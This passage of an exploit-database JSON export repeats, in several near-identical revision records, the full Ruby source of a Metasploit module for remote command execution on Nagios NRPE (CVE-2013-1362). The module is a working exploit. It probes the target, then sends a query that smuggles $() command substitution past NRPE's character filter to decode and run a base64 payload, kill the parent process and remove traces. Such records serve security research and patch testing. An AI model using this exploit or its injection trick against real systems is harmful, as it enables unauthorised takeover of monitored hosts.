0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-03-19T21:56:07", "differentElements": ["modified", "published"], "edition": 53}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-03-22T21:45:17", "history": [], "viewCount": 82, "enchantments": {"score": {"value": 3.3, "modified": "2018-03-22T21:45:17", "vector": "AV:N/AC:L/Au:M/C:N/I:N/A:P/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-03-22T21:45:17", "differentElements": ["modified", "published"], "edition": 54}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-03-23T07:53:05", "history": [], "viewCount": 82, "enchantments": {"score": {"value": 3.3, "modified": "2018-03-23T07:53:05", "vector": "AV:N/AC:L/Au:M/C:N/I:N/A:P/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-03-23T07:53:05", "differentElements": ["modified", "published"], "edition": 55}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-03-23T11:50:59", "history": [], "viewCount": 82, "enchantments": {"score": {"value": 3.3, "modified": "2018-03-23T11:50:59", "vector": "AV:N/AC:L/Au:M/C:N/I:N/A:P/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-03-23T11:50:59", "differentElements": ["modified", "published"], "edition": 56}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-03-23T13:51:05", "history": [], "viewCount": 84, "enchantments": {"score": {"value": 3.3, "modified": "2018-03-23T13:51:05", "vector": "AV:N/AC:L/Au:M/C:N/I:N/A:P/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = 